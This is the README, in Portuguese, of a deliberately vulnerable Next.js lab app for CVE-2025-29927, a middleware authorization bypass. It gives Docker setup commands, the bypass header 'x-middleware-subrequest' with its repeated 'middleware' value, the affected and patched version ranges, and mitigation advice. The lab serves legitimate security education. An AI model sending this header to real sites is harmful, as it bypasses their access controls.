
Um aplicativo Next.js deliberadamente vulnerável a CVE-2025-29927, Bypass de Autorização
Este projeto é uma aplicação Next.js que foi intencionalmente configurada para ser vulnerável a um Bypass de Autorização no Middleware do Next.js (CVE-2025-29927). É fornecido exclusivamente para fins legais, educacionais e de pesquisa.
Ao acessar, usar ou distribuir este código, você reconhece e concorda que:
Instale o Docker e então execute:
docker build -t next-cve-2025-29927 .
docker run -p 3000:3000 next-cve-2025-29927
Abra http://localhost:3000 no seu navegador para ver o resultado.
Capture a requisição usando um proxy de interceptação como ZAP ou Burp, e injete o seguinte cabeçalho na requisição:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
>= 13.0.0, < 13.5.9
>= 14.0.0, < 14.2.25
>= 15.0.0, < 15.2.3
>= 11.1.4, < 12.3.5
Atualize para as versões mais recentes
13.5.9
14.2.25
15.2.3
12.3.5
ou se não puder atualizar, bloqueie as requisições que contenham o cabeçalho x-middleware-subrequest.
Para saber mais sobre a vulnerabilidade, consulte os seguintes recursos: